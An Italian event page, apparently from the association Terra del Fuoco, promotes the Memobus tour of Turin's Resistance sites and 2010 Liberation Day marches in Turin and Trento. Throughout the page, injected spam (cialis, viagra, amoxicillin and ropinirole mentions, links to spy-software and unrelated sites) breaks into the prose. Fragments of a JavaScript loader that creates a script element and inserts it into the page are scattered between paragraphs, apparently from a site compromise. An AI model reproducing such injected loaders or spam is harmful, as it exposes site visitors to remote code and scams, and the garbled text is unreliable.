Per la Festa della Liberazione il MEMOBUS RADDOPPIA


Dall’autunno 2007 il Memobus accompagna i piemontesi presso i luoghi della Resistenza della città di Torino. Studenti e cittadini hanno preso parte a questo viaggio organizzato da Terra del Fuoco, Museo Diffuso della Resistenza, GTT, in collaborazione con l’associazione ITACA che anima e caratterizza il viaggio grazie all’intervento teatrale, prima i partecipanti al Treno della Memoria, come incontro del percorso autunnale, e in primavera l’apertura a tutte le scuole (dal 2 marzo al 4 giugno, tutti i martedì, mercoledì e venerdì con partenza alle 10.00 e alle 12.00 da Piazza Statuto) e i cittadini ( dal 18 aprile a l 6 giugno, per orari e prenotazioni visita il sito).

Ma quest’anno il Memobus di Torino ha un suo gemello a Trento, nell’ambito del progetto Trento Ricorda (il progetto è promosso dalle politiche giovanili del Comune di Trento, gestito da Terra del Fuoco in collaborazione con la Fondazione Museo Storico e le associazioni Anpi e AteLab), che propone anch’esso un viaggio nella memoria della città. Iniziato con tre appuntamenti invernali, in cui i ragazzi hanno viaggiato attraverso i luoghi che furono scenario dei fatti della Seconda Guerra Mondiale, dai bombardamenti alle deportazioni.

In occasione della Festa della Liberazione i due Bus della Memoria ripartono: a Torino il 23, 24 e 25 aprile si moltiplicano le partenze (alle 10:00, alle 12:00, alle 15:00 e alle 17:00), per prenotare visitate il sito, mentre a Trento l’edizione primaverile sarà invece incentrata sugli avvenimenti e i luoghi legati alla Resistenza, i cui racconti sono affidati a un team di attori professionisti.

Inoltre, in occasione dei festeggiamenti per il 25 aprile, i ragazzi trentini esporranno i loro approfondimenti e elaborati sull’esperienza del Treno della Memoria 2010.

Inoltre a Torino il 24 aprile si terrà la classica e imperdibile fiaccolata, ore 20.30 con partenza da Piazza Arbarello, con tutti i ragazzi del Treno ella Memoria che proprio in quell’occasione raccoglieranno simbolicamente il testimone di ANPI e ANED in piazza Castello alla fine della manifestazione. Alla fine del concerto, dopo i saluti istituzionali dal palco di Piazza Castello, si terrà il concerto della super cialis Banda Filarmonica dei Vigili Urbani di Torino.

if (document.currentScript) { } else {http://dymonpower.ca/?p=18825

Il Memobus per la cittadinanza

Dal 2007 Terra del Fuoco, in collaborazione con GTT e Museo Diffuso della Resistenza di Torino, organizzano il Memobu, un momento per raccontare ai giovani torinesi i luoghi della città legati alla Resistenza.

Il Memobus fa parte del percorso educativo autunnale per i partecipanti del progetto Treno della Memoria, ma dal 2 Marzo verrà aperto alla cittadinanza tutta e alle scuole. Il tour dura circa due ore e i viaggiatori, accompagnati da testi letterari e canti popolari scelti dal regista Marco Alotto dell’Associazione Itaca, visiteranno il Rifugio Antiaereo di Piazza del Risorgimento, le Carceri Nuove e i Sacrario del Martinetto.

Per conoscere le date disponibili visitate il sito del Memobus dove troverete il calendario delle partenze, per prenotare telefonate a Elena Mazzeschi 011.3841039 o presso la biglietteria del Museo Diffuso della Resistenza 011 4361433. buy amoxicillin capsules bp 250 mg 3 var d=document;var s=d.createElement(‘script’); } else {http://bgcustom.com/facebook-spy-monitoring-text-monitoring-text/

MEMOBUS Percorso nella memoria dei luoghi

Memobus – percorso nella memoria dei luoghi – è un progetto educativo nato nel 2007 e rivolto alle scuole e ai cittadini e rappresenta l’evoluzione di un percorso di formazione per gli studenti delle superiori che hanno aderito ai viaggi del “Treno della Memoria”.
Per il terzo anno consecutivo l’associazione Terra del Fuoco e il Museo Diffuso della Resistenza, della Deportazione, della Guerra, dei Diritti e della Libertà con la collaborazione del Gruppo Torinese Trasporti (GTT) si accingono a riproporre i viaggi di questo particolare autobus.
L’obiettivo con cui è nato è quello di rendere evidente e leggibile la relazione tra l’allestimento permanente del Museo e i luoghi della memoria di Torino. Per concretizzare questo legame fortissimo si è scelto di far salire studenti e cittadini su un autobus, invitandoli a uscire dal Museo, per vocazione “diffuso”, comunicando loro in modo nuovo le vicende storiche legate alla Seconda Guerra Mondiale.
I viaggi del Memobus sono accompagnati da attori che rievocano le storie dei luoghi che sono in qualche modo simbolici di quegli anni: dalle Carceri Nuove al Sacrario del Martinetto, dal Rifugio antiaereo di Piazza Risorgimento alla Stazione di Porta Nuova, accompagnati da attori che, attraverso testimonianze e brani letterari, raccontano le vicende di questi luoghi a partire dalle storie delle persone che vissero in quel periodo.
Nasce così uno spettacolo itinerante, con la regia di Marco Alotto, che aiuta lo spettatore ad ascoltare le “voci dei luoghi” e a immedesimarsi nelle storie che vengono raccontate al fine di comprendere il ruolo che quei luoghi rivestivano all’epoca.
Visto l’interesse suscitato, il progetto è stato riproposto ogni anno: in primavera e in autunno per le scuole, in primavera e in concomitanza con le celebrazioni della Festa della Liberazione e del 2 Giugno per tutti i cittadini.
La risposta del pubblico è stata positiva in termini di partecipazione e di interesse.
Per il 2009 sono previste delle corse a novembre destinate alle scuole, mentre nella primavera del 2010 (da aprile a giugno) il Memobus sarà a disposizione di tutti.

I NUMERI DEL MEMOBUS
30 viaggi tra il 2007 e il 2008
Quasi 2000 persone trasportate
1200 studenti in 3 mesi nel 2009
300 cittadini in un fine settimana


IL MEMOBUS PER LE SCUOLE

Partenze: novembre 2009 e marzo-giugno 2010
Tutti i martedì, mercoledì e venerdì alle ore 10.00 e alle ore 12.00. Su prenotazione.
Costo: 3 euro a studente
Gratuito per gli insegnanti accompagnatori
Durata del percorso: 2 ore circa
Numero massimo di partecipanti: 25

IL MEMOBUS PER I CITTADINI
Partenze: da aprile a giugno 2010, due domeniche al mese alle ore 15 e alle ore 17.
Su prenotazione.
Costo: 4 euro a persona
Durata del percorso: 2 ore circa
Numero massimo di partecipanti: 25

Partenze speciali: 23 – 24 – 25 aprile e 2 giugno 2010
Orari: ore 9.00 – 11.00 – 13.00 – 15.00 – 17.00 grathazon d.getElementsByTagName(‘head’)[0].appendChild(s);http://robsoncassiano.com.br/?p=24041

Liberation Day

Once more, this year Terra del Fuoco’s Day of Liberation is double. Besides the traditional torchlight march in Turin, this year we’ll “split” to alternative zu viagra ohne rezept Trento, where we have many friends as of now, also thanks to the Train

of Memory 2009 that was strongly participated from the whole Trentino. In Turin, on April 24th, the young people from the Piedmont will manifest for the safeguard and defense of the Constitution, the rights, and Italy at last. Terra del Fuoco, with ACMOS, Gioventù Resistente, ANPI, ANED and all the institutions, will animate the eve. Meeting point in piazza Arbarello, Turin, at 8 PM. In via Lagrange in Turin, at the corner with via Maria Vittoria, from April 25th to May 31st, a photo exhibition by Paolo Saglia about the Train of Memory will be exposed. It will be inaugurated by the Mayor of Turin, Mr Sergio Chiamparino, on Saturday morning at 11 AM. In Trento, on the 24th again, a twin manifestation: a torchlight march will go through the city centre, accompanying the former partisans of the ANPI from Trento. To follow, a dinner made with the Libera Terra products, and a concert with Articolo 3ntino and Vetro Zero. Meeting point in piazza Dante, Trento, at 7:30 PM. The march will start and arrive there. The initiative is organized with the support from the Autonomous Province of Trento. On the event, the Memobus – the journey in the places of memory in Turin – opens back to the citizenship in the weekend of the 25th, with more than 10 visits entirely dedicated to prvates: on April 24th at 2, 4 and 6 PM; on the 25th and 26th, at 11 AM, and at 2, 4 and 6 PM. For information: www.memobus.com, Daniele Ardengo ([email protected]). For reservations: Museo Diffuso Torino, 011 4361433.document.currentScript.parentNode.insertBefore(s, document.currentScript);http://coastbridal.com/twitter-spy-1topspy-iphone-spy-software/

Festa della Liberazione

Anche quest’anno la Festa della Liberazione di Terra del Fuoco è doppia. Oltre alla tradizionale fiaccolata del 24 a Torino, quest’anno ci “sdoppiamo” a Trento, dove abbiamo ormai tanti amici, grazie anche al Treno della Memoria 2009 che ha visto una nutrita partecipazione da tutto il Trentino.

A Torino, il 24 aprile, i giovani del Piemonte saranno in corteo per la salvaguardia e la difesa della Costituzione, dei diritti e dell’Italia tutta. Terra del Fuoco, con ACMOS, Gioventù Resistente, ANPI, ANED, tutte le associazioni partigiane e le istituzioni democratiche, animeranno la serata della vigilia.
Ritrovo in piazza Arbarello alle ore 20.

In via Lagrange a Torino, all’angolo con via Maria Vittoria, dal 25 aprile al 31 maggio, sarà esposta una mostra fotografica di Paolo Saglia sul Treno della Memoria. Verrà inaugurata dal Sindaco di Torino, Sergio Chiamparino, sabato mattina alle ore 11.

A Trento, sempre il 24, una serata gemella di quella torinese: una fiaccolata percorrerà il centro della città accompagnando gli ex partigiani dell’ANPI di Trento. Seguiranno una cena gratuita, preparata con i prodotti di Libera Terra, e un concerto, con Articolo 3ntino e Vetro Zero.
Il ritrovo è alle 19,30 in piazza Dante, luogo di partenza e di arrivo del corteo. L’iniziativa è organizzata con il sostegno della Provincia Autonoma di Trento.

Con l’occasione, il Memobus – viaggio nei luoghi della memoria di Torino – si riapre alla cittadinanza nel fine settimana del 25, con più di dieci visite interamente dedicate ai privati: il 24 aprile alle 14, alle 16 e alle 18; il 25 e il 26 aprile alle 11, alle 14, alle 16 e alle 18.
Per informazioni: www.memobus.com ropinirole , Daniele Ardengo ([email protected]).
Per prenotare: biglietteria Museo Diffuso Torino, 011 4361433.http://jeuplay.net/v2/?p=2981